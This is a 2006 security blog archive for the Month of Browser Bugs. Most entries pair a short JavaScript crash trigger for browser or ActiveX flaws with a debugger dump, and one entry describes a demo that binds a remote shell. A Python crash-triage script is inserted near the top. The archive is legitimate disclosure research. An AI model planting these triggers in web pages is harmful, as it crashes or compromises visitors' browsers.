Thursday, August 17, 2006

Putting the fun in browser fun

Matt Miller posted to the Metasploit Blog about a technique that allows arbitrary code execution in Internet Explorer using any fatal unhandled exception. Every Internet Explorer denial of service flaw is exploitable if MS06-051 has not been installed. More information can be found in the Uninformed Journal article.
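The MS06-051 note above is why the crash dumps in the entries on this page deserve more than a glance. As an added example (not code from this blog or from any MoBB entry), the Python below parses the WinDbg register/instruction excerpts the entries show and classifies each fault as a NULL-page dereference, an invalid read or write, a fault on one side of a string copy, or stack exhaustion, and flags a base register whose four bytes are all printable, the usual sign that a pointer was overwritten with string fill data. The sample dumps are copied from MoBB #30, #18 and #2; the category names and the 64 KB NULL-page cutoff are this script's own conventions, not WinDbg's.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Register lines from WinDbg's 'r' output: "eax=00000000 ebx=01ba7180 ecx=00000000"
REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i|e[bs]p|eip)=([0-9a-f]{8})\b", re.I)
# Symbol line printed before the instruction: "mshtml!CMarkup::EnsureTopElems+0xc:"
SYM_RE = re.compile(r"^(?P<sym>\w+!\S+?)(?:\+0x[0-9a-f]+)?:$", re.I)
# Faulting instruction: "7dc9d8ba 8b7744 mov esi,dword ptr [edi+44h] ds:0023:00000044=????????"
INSN_RE = re.compile(r"^[0-9a-f]{8}\s+[0-9a-f]+\s+(?P<mnem>rep\s+\w+|\w+)(?:\s+(?P<ops>.*))?$", re.I)
# Memory-operand annotations; a value of '?' means WinDbg could not read that address.
MEM_RE = re.compile(r"\b(?P<seg>[cdefgs]s):(?:[0-9a-f]{4}:)?(?P<addr>[0-9a-f]{8})=(?P<val>[0-9a-f?]+)", re.I)
READ_ONLY_DEST = {"cmp", "test", "push"}   # first operand is read, not written
NULL_PAGE_LIMIT = 0x10000                  # lowest 64 KB is never mapped on win32 (this script's cutoff)

@dataclass
class Triage:
    category: str             # null-deref, invalid-read/write, copy-read/write-fault, stack-exhaustion, ambiguous
    access: str               # "read", "write" or "n/a"
    fault_addr: Optional[int]
    symbol: Optional[str]
    controlled_pointer: bool  # base register holds four printable bytes, i.e. looks like string data

def parse_dump(text: str):
    """Return (registers, module!symbol, faulting-instruction match) from a WinDbg excerpt."""
    regs, symbol, insn = {}, None, None
    for line in (ln.strip() for ln in text.strip().splitlines()):
        regs.update((n.lower(), int(v, 16)) for n, v in REG_RE.findall(line))
        sm, im = SYM_RE.match(line), INSN_RE.match(line)
        symbol = sm.group("sym") if sm else symbol
        insn = im or insn
    if insn is None:
        raise ValueError("no faulting-instruction line found")
    return regs, symbol, insn

def printable_dword(value: int) -> bool:
    """True when all four bytes are printable ASCII, e.g. esi=58585850 from an 'XXXX' fill."""
    return all(0x20 <= (value >> s) & 0xFF <= 0x7E for s in (0, 8, 16, 24))

def triage(text: str) -> Triage:
    regs, symbol, insn = parse_dump(text)
    mnem, ops_raw = insn.group("mnem").lower(), insn.group("ops") or ""
    mems = [(m.group("seg").lower(), int(m.group("addr"), 16), m.group("val"))
            for m in MEM_RE.finditer(ops_raw)]
    ops = MEM_RE.sub("", ops_raw).strip()
    base = mnem.split()[-1]                        # "rep movsd" -> "movsd"
    reg_m = re.search(r"\[(e[a-z]{2})", ops)       # base register of the memory operand, if any
    controlled = bool(reg_m) and printable_dword(regs.get(reg_m.group(1), 0))
    # 1. String copy: es: is the destination, ds: the source; the unreadable side is what faulted.
    if base.startswith(("movs", "stos")):
        for seg, addr, val in mems:
            if "?" in val:
                side = "write" if seg == "es" else "read"
                return Triage("copy-%s-fault" % side, side, addr, symbol, controlled)
    # 2. A push/call faulting with no memory operand, or a fault inside the stack probe,
    #    is the guard page being hit: the stack ran out and nothing was overwritten.
    if (symbol or "").lower().endswith("_chkstk") or (base in ("push", "call") and not mems):
        return Triage("stack-exhaustion", "write", regs.get("esp"), symbol, controlled)
    # 3. Plain memory operand: read or write, and does the address fall in the NULL page?
    if mems:
        seg, addr, val = next(((s, a, v) for s, a, v in mems if "?" in v), mems[0])
        access = "write" if "[" in ops.split(",")[0] and base not in READ_ONLY_DEST else "read"
        if "?" not in val:
            return Triage("ambiguous", access, addr, symbol, controlled)
        cat = "null-deref" if addr < NULL_PAGE_LIMIT else "invalid-" + access
        return Triage(cat, access, addr, symbol, controlled)
    return Triage("ambiguous", "n/a", None, symbol, controlled)

# Excerpts copied from the MoBB #30, #18 and #2 entries on this page (leading register lines trimmed).
SAMPLES = {
    "mobb30": """edx=7dc95b90 esi=00000000 edi=00000000
eip=7dc9d8ba esp=0013dc98 ebp=0013dccc
mshtml!CMarkup::EnsureTopElems+0xc:
7dc9d8ba 8b7744 mov esi,dword ptr [edi+44h] ds:0023:00000044=????????""",
    "mobb18": """eip=773e0ba3 esp=0013b14c ebp=0013b158
comctl32!DSA_SetItem+0x60:
773e0ba3 f3a5 rep movsd ds:0013b188=41424344 es:fffffff0=????????""",
    "mobb2": """edx=00030608 esi=58585850 edi=00000022
eip=7c911f52 esp=0013afcc ebp=0013b1ec
ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??""",
}

def triage_all() -> dict:
    return {name: triage(dump).category for name, dump in SAMPLES.items()}
```

The classification is a first pass on the faulting instruction alone; a dump whose memory operand WinDbg could still read comes back as "ambiguous" rather than a guess.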

Monday, August 14, 2006

Orphan Objects bug was silently fixed

MoBB #30 was silently fixed last Tuesday by Microsoft's cumulative security patch for Internet Explorer (MS06-042).

Read more at my blog: "MS06-042: One Silent Fix, One No Fix".

Tuesday, August 08, 2006

MS06-044 - Internet Explorer 5.x

Microsoft released MS06-044 to address a local zone privilege escalation vulnerability I reported in Internet Explorer 5 on Windows 2000. According to Microsoft, over five million people are still using the Windows Update service with Internet Explorer 5. This vulnerability exploits an XSS flaw in the RT_HTML resource of a DLL included with Windows 2000. The demonstration below will use this XSS flaw to execute calc.exe on vulnerable systems.

Demonstration

Tuesday, August 01, 2006

AxMan ActiveX Fuzzer

As promised, I have released my ActiveX fuzzing tool, aptly named AxMan. This tool was used to discover and debug almost every single ActiveX flaw published during the Month of Browser Bugs. In addition to the MoBB issues, this tool discovered over 100 unique flaws on a Windows XP SP2 system with common third-party packages installed. I am releasing this tool without my blacklist.js file of discovered vulnerabilities; this should give the vendors some breathing room while they figure out how to address these problems. An online demonstration of AxMan is available, but the interface is not designed to work across a slow network and a locally installed version will run much faster. Enjoy and happy bug hunting!

Monday, July 31, 2006

Concluding the Month of Browser Bugs

The Month of Browser Bugs is finished! Jericho was kind enough to write up a review of the MoBB project in the OSVDB Blog. Although the MoBB project is complete, this blog will continue to be used to publish new and interesting browser hacks. Aviv Raff and Pusscat have offered to help out in the coming months by moderating comments and publishing new browser-related security findings. Thanks again to everyone who submitted comments and otherwise participated in the project.

MoBB #31: Safari KHTMLParser::popOneBlock

The following bug was tested on the latest version of Safari on a fully-patched Mac OS X 10.4 (PPC) system. Safari will dereference and call a pointer from the heap if a script element, inside a div element, redefines the document body. Code execution is possible, but more time is required to develop a reliable exploit. This bug was discovered by Jose Avila III and Pusscat. Strangely enough, this bug does not affect KDE's Konqueror (tested 3.5.3).

Please see the demo source code for an example.

Warning: The following link may cause your browser to crash.
Demonstration

Program received signal EXC_BAD_INSTRUCTION, Illegal instruction/operand.
(gdb) x/i $pc
0x4aeec58: .long 0x690074

#0 0x04aeec58 in ?? ()
#1 0x95c6f884 in KHTMLParser::popOneBlock ()
#2 0x95c43998 in KHTMLParser::freeBlock ()
#3 0x95cdff3c in KHTMLParser::finished ()
#4 0x95cdfe7c in khtml::HTMLTokenizer::end ()
#5 0x95c7ec8c in khtml::HTMLTokenizer::finish ()
#6 0x95d90358 in KHTMLPart::endIfNotLoading ()

0x95c6f8c4 <_ZN11KHTMLParser11popOneBlockEb+132>: lwz r2,0(r3)
0x95c6f8c8 <_ZN11KHTMLParser11popOneBlockEb+136>: lwz r12,268(r2)
0x95c6f8cc <_ZN11KHTMLParser11popOneBlockEb+140>: mtctr r12
0x95c6f8d0 <_ZN11KHTMLParser11popOneBlockEb+144>: bctrl

This bug will be added to the OSVDB:
Apple Safari KHTMLParser::popOneBlock Code Execution

Saturday, July 29, 2006

MoBB #30: Orphan Object Properties

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug was discovered by Aviv Raff while working on a new browser fuzzing tool. It is possible to trigger a NULL dereference by accessing the property of an object that is inside a deleted frame.

Please see the demo source code for an example.

Demonstration

eax=00000000 ebx=01ba7180 ecx=00000000
edx=7dc95b90 esi=00000000 edi=00000000
eip=7dc9d8ba esp=0013dc98 ebp=0013dccc
mshtml!CMarkup::EnsureTopElems+0xc:
7dc9d8ba 8b7744 mov esi,dword ptr [edi+44h] ds:0023:00000044=????????

This bug will be added to the OSVDB:
Microsoft IE Orphan Object Property Access NULL Dereference

MoBB #29: ADODB.Recordset NextRecordset

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the NextRecordset method repeatedly with a long string can result in an invalid memory access inside the SysFreeString function. This bug is similar to MoBB #8 and MoBB #21.

var a = new ActiveXObject('ADODB.Recordset');
var b = 'XXXX';
while (b.length <= 1024*512) b+=b;
for (var i = 0; i < 32768; i++) try { a.NextRecordset(b); } catch(e) {}

Demonstration

eax=00181358 ebx=0013b1c4 ecx=00000007
edx=0000400c esi=02d30020 edi=00000008
eip=77124874 esp=0013ae68 ebp=0013ae6c
OLEAUT32!SysFreeString+0x45:
77124874 8b0e mov ecx,[esi] ds:0023:02d30020=???

This bug will be added to the OSVDB:
Microsoft IE ADODB.Recordset SysFreeString Invalid Length

Thursday, July 27, 2006

MoBB #28: Mozilla Navigator Object

The following bug (mfsa2006-45) was tested on Firefox 1.5.0.4 running on Windows 2000 SP4, Windows XP SP2, and a recently updated Gentoo Linux system. This bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of Mozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is trivial to turn into a working exploit. The demonstration link below will attempt to launch "calc.exe" on Windows systems, execute "touch /tmp/METASPLOIT" on Linux systems, and bind a command shell to port 4444 for Mac OS X Intel and PowerPC systems (thanks Todd and nemo!).

window.navigator = (0x01020304 / 2);
java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0);

Demonstration

This bug has been added to the OSVDB:
Mozilla Multiple Product Window Navigator Object Arbitrary Code Execution

MoBB #27: NDFXArtEffects RGBExtraColor

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. A stack overflow can occur by setting any of the RGBExtraColor, RGBForeColor, and RGBBackColor properties to a long string value. Since the entire string is placed into a stack buffer, you are able to select exactly which instruction faults based on the length of the string. Does anyone know of a way to exploit this for something besides a crash?

var b = 'XXXX';
while(b.length <=1024*1024) b+=b;
var a = new ActiveXObject('DXImageTransform.Microsoft.NDFXArtEffects.1');
var i = 1016320;
a.RGBExtraColor = b.substring(0,i);

Demonstration

eax=4db88a05 ebx=000f8201 ecx=7c809f8a
edx=0013b274 esi=02f50024 edi=00000000
eip=4db88a11 esp=00043000 ebp=0013b254
wmm2fxb!DXColorFromBSTR+0xc8:
4db88a11 57 push edi

This bug will be added to the OSVDB:
Microsoft IE NDFXArtEffects Multiple Property Stack Overflow

Wednesday, July 26, 2006

MoBB #26: Opera CSS Background

The following bug was tested on the latest version of Opera 9 on a fully-patched Windows XP SP2 system. A memory corruption issue can be triggered by setting the background property of any DHTML element to a long HTTPS URL.

var a = document.createElement('a');
var b = 'XXXX';
while (b.length <= 1024*1024) b+=b;
a.style.background = 'url(https://' + b + ')';

Demonstration

eax=0c4f0020 ebx=00000000 ecx=0c4f0020
edx=0a4b0030 esi=00953ff8 edi=00200008
eip=67befb98 esp=0012e38c ebp=0012e404
Opera_679e0000+0x20fb98:
67befb98 668b32 mov si,[edx] ds:0023:0a4b0030=0000

This bug will be added to the OSVDB:
Opera CSS Background Property HTTPS Memory Corruption

Tuesday, July 25, 2006

MoBB #25: Native Function Iterator

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. A NULL reference can be triggered by using javascript to iterate over a native function.

for (var i in window.alert) { var a = 1; }

Demonstration

eax=00000000 ebx=ffffffff ecx=0013b3f0
edx=0013b3f0 esi=00000000 edi=0013b488
eip=7dceef12 esp=0013b3d0 ebp=0013b3d4
mshtml!CPtrBagVTableAggregate::CIterator::Start+0x1e:
7dceef12 ff36 push dword ptr [esi] ds:0023:00000000=?????

This bug will be added to the OSVDB:
Microsoft IE Native Function Iteration NULL Dereference

Sunday, July 23, 2006

MoBB #24: Forms.ListBox.1 ListWidth

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system with the latest version of Office 2003 installed. Setting the ListWidth property of either the Forms.ListBox.1 or Forms.ComboBox.1 objects to 0x7fffffff will result in an integer overflow exception, while setting it to 0x7ffffffe will trigger a NULL dereference.

var a = new ActiveXObject('Forms.ListBox.1');
a.ListWidth = 0x7ffffffe;

Demonstration

eax=00000000 ebx=0013b0d8 ecx=00000001
edx=00000052 esi=0013b084 edi=600b115e
eip=60009115 esp=0013b044 ebp=0013b044
FM20!DllGetClassObject+0x6bd5:
60009115 0fb710 movzx edx,word ptr [eax] ds:0023:00000000=????

This bug will be added to the OSVDB:
Microsoft IE Forms Multiple Object ListWidth Property Integer Overflow

MoBB #23: NMSA.ASFSourceMediaDescription dispValue

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows 2000 SP4 system. Setting the dispValue property of this object to a long string triggers a stack overflow (not a buffer overflow).

var a = new ActiveXObject('NMSA.ASFSourceMediaDescription.1');
var b = 'XXXX';
while (b.length <= 1024) b += b;
a.dispValue = b;

Demonstration

eax=027221f8 ebx=00000000 ecx=0019d198
edx=00160dae esi=027221f8 edi=00000000
eip=77a22395 esp=00032f78 ebp=00033180
OLEAUT32!CTypeInfo2::VariantVtOfHtype+0x9:
77a22395 56 push esi

This bug will be added to the OSVDB:
Microsoft IE NMSA.ASFSourceMediaDescription dispValue Stack Overflow

Friday, July 21, 2006

MoBB #22: Internet.HHCtrl Click

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the Click() method on this object, without first initializing the URL, will trigger a NULL dereference. This bug was submitted by Alex F.

var a = new ActiveXObject("Internet.HHCtrl.1");
a.Click();

Demonstration

eax=00000000 ebx=00000000 ecx=00000000
edx=00000000 esi=0237bb68 edi=00000000
eip=7db374c0 esp=0013a3d0 ebp=0013a3f0
hhctrl!CHtmlHelpControl::GetCurrentUrl+0x3c:
7db374c0 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug will be added to the OSVDB:
Microsoft IE HTML Help COM Object Click Method NULL Dereference

Thursday, July 20, 2006

MoBB #21: CEnroll stringToBinary

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the stringToBinary() function with a long string for the second parameter can result in an invalid memory access inside the SysAllocStringLen function. This bug is similar to MoBB #8.

var a = new ActiveXObject('CEnroll.CEnroll.2');
var b = 'BOOM';
while (b.length <= 1024*1024) b+=b;
a.stringToBinary(1, b);

Demonstration

eax=03580024 ebx=00300000 ecx=0005fc08
edx=00300000 esi=03571000 edi=03701004
eip=77124ba4 esp=0013b200 ebp=0013b20c
OLEAUT32!SysAllocStringLen+0x4f:
77124ba4 f3a5 rep movsd ds:03571000=???????? es:03701004=00000000

This bug will be added to the OSVDB:
Microsoft IE CEnroll SysAllocStringLen Invalid Length

Wednesday, July 19, 2006

MoBB #20: OVCtl NewDefaultItem

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system and requires Outlook to be installed. Calling the NewDefaultItem() method triggers a NULL dereference. This bug was submitted by Alfredo Melloni.

var a = new ActiveXObject('OVCtl.OVCtl.1');
a.NewDefaultItem();

Demonstration

eax=00000000 ebx=00000800 ecx=0013b234
edx=0013b200 esi=00000000 edi=357a3b58
eip=357b07e3 esp=0013b1c4 ebp=0013b240
OUTLCTL!DllUnregisterServer+0x3678:
357b07e3 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug will be added to the OSVDB:
Microsoft IE OVCtl NewDefaultItem Method NULL Dereference

MoBB #19: DataSourceControl getDataMemberName

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system and requires Office 2003 to be installed (older versions of this control have not been tested). Calling the getDataMemberName() method with a large negative integer value results in an integer overflow and a NULL dereference.

var a = new ActiveXObject('OWC11.DataSourceControl.11');
a.getDataMemberName(-0x80000000);

Demonstration

eax=0000001c ebx=025d15a8 ecx=0000001c
edx=387d0e24 esi=0013b234 edi=0013b204
eip=3878cfac esp=0013b1fc ebp=0013b228
OWC11!DllGetClassObject+0x5a3e4:
3878cfac 8b01 mov eax,[ecx] ds:0023:0000001c=????????

This bug will be added to the OSVDB:
Microsoft IE OWC11.DataSourceControl getDataMemberName Method Integer Overflow

Tuesday, July 18, 2006

MoBB #18: WebViewFolderIcon setSlice

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the setSlice() method with the first argument set to 0x7fffffff triggers an invalid memory copy.

var a = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
a.setSlice(0x7fffffff, 0, 0x41424344, 0);

Demonstration

eax=00000010 ebx=001e4940 ecx=00000004
edx=7c97c0d8 esi=0013b188 edi=fffffff0
eip=773e0ba3 esp=0013b14c ebp=0013b158
comctl32!DSA_SetItem+0x60:
773e0ba3 f3a5 rep movsd ds:0013b188=41424344 es:fffffff0=????????

This bug will be added to the OSVDB:
Microsoft IE WebViewFolderIcon setSlice Integer Overflow

Sunday, July 16, 2006

MoBB #17: Gradient StartColorStr

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the StartColorStr or EndColorStr properties to a large value leads to a stack overflow exception (not a buffer overflow).

var a = new ActiveXObject('DXImageTransform.Microsoft.Gradient.1');
var b = 'XXXX';
while (b.length <= (1024*1024)) b += b;
a.StartColorStr = b;

Demonstration

eax=00007004 ebx=00100001 ecx=0004215c
edx=0013b1ac esi=03b00024 edi=00000000
eip=6be11a16 esp=0013b154 ebp=0013b190
dxtmsft!_chkstk+0x25:
6be11a16 8501 test [ecx],eax ds:0023:0004215c=00000000

This bug will be added to the OSVDB:
Microsoft IE DXImageTransform.Microsoft.Gradient Multiple Property Stack Overflow

MoBB #16: MHTMLFile Location

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the location or URL property triggers a NULL dereference. Thanks to 'sniper' for the submission.

var a = new ActiveXObject('mhtmlfile');
a.location = "http://browserfun.blogspot.com";

Demonstration

eax=00000000 ebx=00000001 ecx=0000ae80
edx=0020540c esi=019c2420 edi=00000000
eip=7dcd113e esp=00139048 ebp=0013b074
mshtml!COmWindowProxy::CanNavigateToUrlWithZoneCheck+0x9b:
7dcd113e 80783e00 cmp byte ptr [eax+0x3e],0x0 ds:0023:0000003e=??

This bug will be added to the OSVDB:
Microsoft IE MHTMLFile Multiple Property NULL Dereference

Friday, July 14, 2006

MoBB #15: FolderItem Access

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Accessing the object reference of this control triggers a NULL dereference in the security check :-)

<object id="target" classid="clsid:FEF10FA2-355E-4e06-9381-9B24D7F7CC88">
</object>

var a = document.getElementById('target');
alert(a.object);

Demonstration

eax=0000eb6c ebx=00000000 ecx=00000000
edx=09105b62 esi=0013b1ac edi=03cec120
eip=7cb86ce4 esp=0013aee4 ebp=0013b184
SHELL32!CFolder::_SecurityCheck:
7cb86ce4 83790c00 cmp dword ptr [ecx+0xc],0x0 ds:0023:0000000c=????????

This bug will be added to the OSVDB:
Microsoft IE FolderItem Object NULL Dereference

MoBB #14: Konqueror replaceChild()

The following bug was tested on KDE 3.5.1 on a current Gentoo Linux system. Calling the replaceChild() method on almost any DOM element can result in a NULL dereference.

document.replaceChild(0);

Demonstration

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1231504512 (LWP 11418)]
0xb6552ca0 in DOM::Node::replaceChild () from /usr/kde/3.5/lib/libkhtml.so.4
(gdb) display /i $pc
1: x/i $pc 0xb6552ca0 <_ZN3DOM4Node12replaceChildERKS0_S2_+110>: testb $0x8,0x22(%edx)
(gdb) i r $edx
edx 0x0 0

This bug will be added to the OSVDB:
KDE Konqueror replaceChild() NULL Dereference

Wednesday, July 12, 2006

MoBB #13: RevealTrans Transition

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the Transition property of this object triggers a NULL dereference.

var a = new ActiveXObject('DXImageTransform.Microsoft.RevealTrans.1');
a.Transition = 1;

Demonstration

eax=00000000 ebx=00000000 ecx=35cde0c4
edx=00174972 esi=02d701d8 edi=00000001
eip=35cde0fe esp=0012b240 ebp=0012b25c
dxtmsft!CDXTRevealTrans::put_Transition+0x3a:
35cde0fe 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug will be added to the OSVDB:
Microsoft IE DXImageTransform.Microsoft.RevealTrans Transition Property NULL Dereference

Tuesday, July 11, 2006

MoBB #12: TriEditDocument URL

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the URL property of this object triggers a NULL dereference.

var a = new ActiveXObject('TriEditDocument.TriEditDocument');
a.URL = "Boom!";

Demonstration

eax=00000000 ebx=00000001 ecx=000076b6
edx=018f486c esi=018f3c10 edi=00000000
eip=7dcd113e esp=00137034 ebp=00139060
mshtml!COmWindowProxy::CanNavigateToUrlWithZoneCheck+0x9b:
7dcd113e 80783e00 cmp byte ptr [eax+0x3e],0x0 ds:0023:0000003e=??

This bug will be added to the OSVDB:
Microsoft IE TriEditDocument URL Property NULL Dereference

Monday, July 10, 2006

MoBB #11: HtmlDlgSafeHelper fonts

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the "fonts" property of this object triggers a NULL dereference.

var a = new ActiveXObject('HtmlDlgSafeHelper.HtmlDlgSafeHelper');
a.fonts = "Goodbye!";

Demonstration

eax=00000000 ebx=76207320 ecx=02941584
edx=762691dc esi=02941534 edi=0013b25c
eip=762163fb esp=0013b1ec ebp=0013b260
mshtmled!CHtmlDlgSafeHelper::get_Fonts+0x66:
762163fb 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug was reported to Microsoft in March of 2006.
This bug will be added to the OSVDB:
Microsoft IE HtmlDlgSafeHelper fonts Property NULL Dereference

Sunday, July 09, 2006

MoBB #10: DXTFilter Enabled

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. By setting the 'Enabled' property of this control to a true value, we can trigger a NULL dereference.

var a = new ActiveXObject('Object.Microsoft.DXTFilter');
a.Enabled = 1;

Demonstration

eax=00000000 ebx=6bdd4728 ecx=00001008
edx=001bffff esi=02910488 edi=00000000
eip=6bde8881 esp=0013b250 ebp=0013b258
dxtrans!CDXTFilter::put_Enabled+0x75:
6bde8881 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug was reported to Microsoft in March of 2006.
This bug will be added to the OSVDB:
Microsoft IE Object.Microsoft.DXTFilter Enabled Property NULL Dereference

Saturday, July 08, 2006

MoBB #9: DirectAnimation.DAUserData Data

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The "Data" property of the DAUserData object is designed to be accessed only after it has been initialized. We can trigger a NULL dereference by asking for it without calling the Init() method first.

var a = new ActiveXObject('DirectAnimation.DAUserData');
a.Data = 'Hello';

Demonstration

eax=00000000 ebx=5a327320 ecx=00000000
edx=0003b7c8 esi=00000000 edi=0003f1cc
eip=5a3415b6 esp=0013b1a4 ebp=0013b1b4
danim!CRUserDataImpl::GetData+0x5:
5a3415b6 837e0800 cmp dword ptr [esi+0x8],0x0 ds:0023:00000008=????????

This bug was reported to Microsoft in March of 2006.
This bug will be added to the OSVDB:
Microsoft IE DirectAnimation.DAUserData Data Property NULL Dereference

Friday, July 07, 2006

MoBB #8: RDS.DataControl URL

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows 2000 SP4 system. The RDS.DataControl object copies the URL parameter from javascript using the SysAllocStringLen routine in OLE32.dll. On Windows 2000, this can lead to an invalid length calculation that results in a memory read going beyond the end of the page. It appears that some form of heap corruption may be occurring before the access violation, but without a SEH pointer on the heap, this isn't useful for exploitation. If you can find a way to achieve code execution using this bug, please contact me for a prize :-)

var a = new ActiveXObject('RDS.DataControl');
var b = "X";
while (b.length < (1024*256)) a.URL = (b+=b);

Demonstration

eax=001be00c ebx=00005a70 ecx=00000231
edx=00005a70 esi=00191000 edi=001c31b8
eip=779d927a esp=0012b1b4 ebp=7c59c147
OLEAUT32!SysAllocStringLen+0x7a:
779d927a f3a5 rep movsd ds:00191000=???????? es:001c31b8=00580058

This bug was reported to Microsoft in March of 2006.
This bug will be added to the OSVDB:
Microsoft IE RDS.DataControl SysAllocStringLen Invalid Length

Thursday, July 06, 2006

MoBB #7: Table.Frameset

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug was found by Aviv Raff using the DOM-Hanoi fuzzer script. DOM-Hanoi works by building trees of every combination of elements up to the specified depth. An alternate PoC could use plain HTML instead of javascript.

var a = document.createElement('table');
var b = document.createElement('frameset');
a.appendChild(b);

Demonstration

eax=00000000 ebx=01884710 ecx=01886c60
edx=00000027 esi=0013aeb0 edi=01884730
eip=7dc995ad esp=0013ae88 ebp=0013ae9c6
mshtml!CTreePos::NextTreePos+0x23:
7dc995ad f60010 test byte ptr [eax],0x10 ds:0023:00000000=??

This bug was reported to Microsoft in March of 2006.
This bug will be added to the OSVDB:
Microsoft IE Frameset inside Table NULL Dereference

Wednesday, July 05, 2006

MoBB #6: StructuredGraphicsControl SourceURL

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug appears to be triggered by a call to URLOpenBlockingStream() with a NULL pointer referenced by the ppStream argument. The only way I found to trigger this bug is by creating the object through the ActiveXObject interface -- using the standard object/classid syntax (as described here) does not result in a crash.

var a = new ActiveXObject('DirectAnimation.StructuredGraphicsControl');
a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';

Demonstration

eax=00000000 ebx=7726d35c ecx=02481f30
edx=0013b1a4 esi=00000000 edi=00000000
eip=772ba3bc esp=0013b18c ebp=0013b1b8
urlmon!CBaseBSCB::KickOffDownload+0x7a:
772ba3bc 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006.
This bug will be added to the OSVDB:
Microsoft IE DirectAnimation.StructuredGraphicsControl SourceURL NULL Dereference

Tuesday, July 04, 2006

MoBB #5: DHTML setAttributeNode()

The following bug was tested on the latest version of Safari (2.0.4 / 419.3) on a fully-patched Mac OS X (10.4.7 - Build 8J135) system. This bug was discovered by Dennis Cox using a modified version of the Hamachi test. This bug does not trigger using the Konqueror KHTML/KJS engine included with KDE 3.5.1, even though these products share code.

var a = document.createElement("a");
a.setAttributeNode();

Demonstration

Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x0000000c

Thread 0 Crashed:
0 com.apple.WebCore DOM::NamedAttrMapImpl::setNamedItem()
1 com.apple.WebCore DOM::Element::setAttributeNodeNS()
2 com.apple.WebCore DOM::Element::setAttributeNode()

This bug will be added to the OSVDB:
Apple Safari DHTML setAttributeNode() NULL Dereference

Monday, July 03, 2006

MoBB #4: Mozilla Firefox DesignMode

The following bug was tested on Mozilla Firefox 1.5.0.2 running on Gentoo Linux. This bug was fixed in Firefox 1.5.0.3, after three other people reported this issue to Mozilla. This bug results in a function pointer being called that no longer exists on the heap. Exploiting it is more annoying than difficult, since getting user-provided memory to map over the freed object pointer is more convoluted than it should be.

document.designMode = "on";
for (i=0; i < 300; i++) {
document.execCommand("InsertHTML", false, "<iframe src='localhost'/>");
}
document.designMode = "off";
window.location.reload(true);

Demonstration

EIP on Gentoo Linux / Firefox 1.5.0.1
0x00737069 in ?? ()

This bug was addressed in MFSA2006-30.
This bug has been added to the OSVDB:
Mozilla Firefox iframe.contentWindow.focus() Overflow

Sunday, July 02, 2006

MoBB #3: OutlookExpress.AddressBook

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows 2000 SP4 system. It appears to have been resolved (via killbit) in a recent update to Windows XP SP2. This bug is one of many that are triggered by loading a non-ActiveX COM object from inside Internet Explorer.

a = new ActiveXObject('OutlookExpress.AddressBook'); // ActiveXObject is the JScript constructor; there is no 'ActiveXControl'

Demonstration

eax=00000000 ebx=06622008 ecx=00000002
edx=065814e4 esi=00000000 edi=00000000
eip=0648b2f5 esp=0012a734 ebp=0012a754
msoe!IDwGetOption+0x78:
0648b2f5 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006.
This bug has been added to the OSVDB:
Microsoft IE OutlookExpress.AddressBook COM Object NULL Dereference.

MoBB #2: Internet.HHCtrl Image Property

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug is interesting because a small heap overflow occurs each time this property is set. The bug is difficult to detect unless heap verification has been enabled in the global debug flags for iexplore.exe. The demonstration below results in a possibly exploitable heap corruption after 128 or more iterations of the property set.

var a = new ActiveXObject("Internet.HHCtrl.1");
var b = unescape("XXXX");
while (b.length < 256) b += b;

for (var i=0; i<4096; i++) {
a['Image'] = b + "";
}

Demonstration

eax=00030288 ebx=00030000 ecx=7ffdd000
edx=00030608 esi=58585850 edi=00000022
eip=7c911f52 esp=0013afcc ebp=0013b1ec
ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??

